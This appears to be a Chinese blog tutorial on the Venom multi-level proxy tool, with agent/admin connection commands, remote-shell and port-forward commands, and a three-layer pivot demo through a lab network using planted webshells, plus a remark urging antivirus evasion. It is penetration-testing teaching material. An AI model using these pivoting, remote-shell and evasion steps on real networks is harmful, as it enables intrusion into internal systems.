Venom的簡單使用介紹
Venom項(xiàng)目地址:https://github.com/Dliv3/Venom/releases
Venom介紹:
Venom是一款為滲透測試人員設(shè)計(jì)的使用Go開發(fā)的多級代理工具,可將多個(gè)節(jié)點(diǎn)進(jìn)行連接,然后以節(jié)點(diǎn)為跳板,構(gòu)建多級代理。滲透測試人員可以使用Venom輕松地將網(wǎng)絡(luò)流量代理到多層內(nèi)網(wǎng),并輕松地管理代理節(jié)點(diǎn)。
打開目錄可以看到分為:admin(服務(wù)端)和agent(客戶端),服務(wù)端是在本地運(yùn)行,客戶端則是在目標(biāo)服務(wù)器上運(yùn)行,分類也是包含了大部分操作系統(tǒng)的類型,scripts目錄里的腳本是用來端口復(fù)用的:

Windows下直接運(yùn)行,會(huì)出現(xiàn)版本號(hào)并提示一些用法:

1.Venom的正向代理與反向代理
agent監(jiān)聽端口,admin發(fā)起連接:
./agent_linux_x64 -lport 8888
./admin_macos_x64 -rhost 192.168.204.139 -rport 8888
admin監(jiān)聽端口,agent發(fā)起連接:
./admin_macos_x64 -lport 9999
./agent_linux_x64 -rhost 192.168.0.103 -rport 9999
2.admin節(jié)點(diǎn)內(nèi)置命令
-
show顯示網(wǎng)絡(luò)拓?fù)?br> A表示admin節(jié)點(diǎn),數(shù)字表示agent節(jié)點(diǎn) ,如下圖所示,代表了進(jìn)行兩層的代理,有兩個(gè)agent節(jié)點(diǎn):
-
goto ID進(jìn)入某agent節(jié)點(diǎn)
進(jìn)入節(jié)點(diǎn)1,對其利用
-
socks 端口建立到某節(jié)點(diǎn)的socks5代理
建立本地與節(jié)點(diǎn)1的Socks5代理,代理端口為9999:
-
setdes/getdes設(shè)置/獲取節(jié)點(diǎn)信息描述
起到標(biāo)記節(jié)點(diǎn)的作用:
-
shell獲取節(jié)點(diǎn)的交互式shell
-
upload/download向節(jié)點(diǎn)上傳/從節(jié)點(diǎn)下載文件
將本地桌面上的test.txt上傳到節(jié)點(diǎn)1上:
將節(jié)點(diǎn)1上的test2.txt下載到本地的:

-
lforward/rforward將本地端口轉(zhuǎn)發(fā)到遠(yuǎn)程/將遠(yuǎn)程端口轉(zhuǎn)發(fā)到本地
lforward將admin節(jié)點(diǎn)本地的8888端口轉(zhuǎn)發(fā)到node1的8888端口
(node 1) >>> lforward 127.0.0.1 8888 8888
forward local network 127.0.0.1 port 8888 to remote port 8888
rforward 將node1網(wǎng)段的192.168.204.103端口8889轉(zhuǎn)發(fā)到admin節(jié)點(diǎn)本地的8889端口
(node 1) >>> rforward 192.168.204.103 8889 8889
forward remote network 192.168.204.103 port 8889 to local port 8889
-
help打印幫助信息

Venom三層代理演示
這次準(zhǔn)備的環(huán)境如下圖拓?fù)?,每個(gè)網(wǎng)段各有一個(gè)CMS,Internet只能訪問DMZ區(qū);DMZ區(qū)可以訪問服務(wù)區(qū),不能訪問設(shè)備區(qū);服務(wù)區(qū)與設(shè)備區(qū)互通。
都是Windows環(huán)境,為追求效率,Shell已經(jīng)寫入目,其中192.168.1.100映射出來的地址是10.70.10.117:

蟻劍直接連接我們預(yù)設(shè)的shell:http://10.70.10.117/shell.php,并上傳對應(yīng)的agent端:

我們這里在蟻劍終端執(zhí)行agent64.exe -lport 9999,目標(biāo)服務(wù)器本地監(jiān)聽9999端口:

本地發(fā)起連接,執(zhí)行對應(yīng)的admin服務(wù)端,指定目標(biāo)IP和端口,可以看到顯示Venom Admin Node Start,說明連接成功,show一下可以看到多了個(gè)節(jié)點(diǎn)1:

goto 1,選擇進(jìn)入節(jié)點(diǎn)1,執(zhí)行shell進(jìn)入10.70.10.117的CMD模式:

第一層代理:
輸入socks 9999,建立socks5代理隧道,本地的socks5代理就是127.0.0.1:9999:

配置proxifier
添加代理:菜單欄 -> Profile -> proxy servers -> add
將127.0.0.1:9999添加進(jìn)去:

配置代理規(guī)則:菜單欄 -> Profile -> proxification Rules。
規(guī)則分為三種模式:Proxy(代理)、Direct(放行,不走代理)、Block(阻塞)。
我們將不需要代理的設(shè)為Direct,需要代理的自行添加exe應(yīng)用:

點(diǎn)擊左下角的Add,選擇添加代理的應(yīng)用,比如Google,填好Name,選擇chrome.exe,最后點(diǎn)擊Action要選擇Proxy SOCKS5 127.0.0.1:

這里設(shè)置了Google和蟻劍可以走127.0.0.1:9999的代理:

Google之前肯定是不能訪問服務(wù)區(qū)的,現(xiàn)在可以直接訪問內(nèi)網(wǎng)的192.168.2.100,可以看到連接成功:

第二層代理
這里蟻劍已經(jīng)走了代理,可以直接連接我們寫好的shell,并上傳agent客戶端:

直接在節(jié)點(diǎn)2上開啟監(jiān)聽,也就是在192.168.1.100上監(jiān)聽9998端口,讓192.168.2.100發(fā)起連接:

192.168.2.100執(zhí)行命令連接192.168.1.100的9998端口:agent64.exe -rhost 192.168.1.100 -rport 9998

執(zhí)行show,看到多了個(gè)節(jié)點(diǎn)2:

goto 2,在節(jié)點(diǎn)2上開啟socks5代理隧道,也就是本地的:127.0.0.1:9998。

配置proxifier
添加代理:
將127.0.0.1:9998添加進(jìn)去:

配置代理規(guī)則:
之前設(shè)置的Google瀏覽器和蟻劍也都需要換成127.0.0.1:9998,第一層代理的流量也在其中:

Google瀏覽器訪問192.168.3.100

第三層代理
這里蟻劍已經(jīng)走了127.0.0.1:9998的代理,可以直接連接我們寫好的shell,并上傳agent客戶端:

直接在節(jié)點(diǎn)2上開啟監(jiān)聽,也就是在192.168.2.100上監(jiān)聽9997端口,讓192.168.3.100發(fā)起連接:

192.168.3.100執(zhí)行命令連接192.168.2.100的9998端口:agent64.exe -rhost 192.168.2.100 -rport 9997

建立socks隧道:

配置proxifier
添加代理:
將127.0.0.1:9997添加進(jìn)去:

配置代理規(guī)則:
修改代理:

通過上面的測試,多層代理的操作基本相似。
至此,本篇文章介紹就結(jié)束了,謝謝觀看,若有疑問請留言,若有錯(cuò)誤請指教。
很不幸,最近在做免殺測試的時(shí)候,發(fā)現(xiàn)毒液64位的已經(jīng)被360殺了,各位做好免殺吧_2020.12.8
推薦另一篇內(nèi)網(wǎng)滲透的文章:內(nèi)網(wǎng)滲透
推薦兩篇關(guān)于域滲透和金銀票據(jù)的文章:
大佬看完給個(gè)贊唄






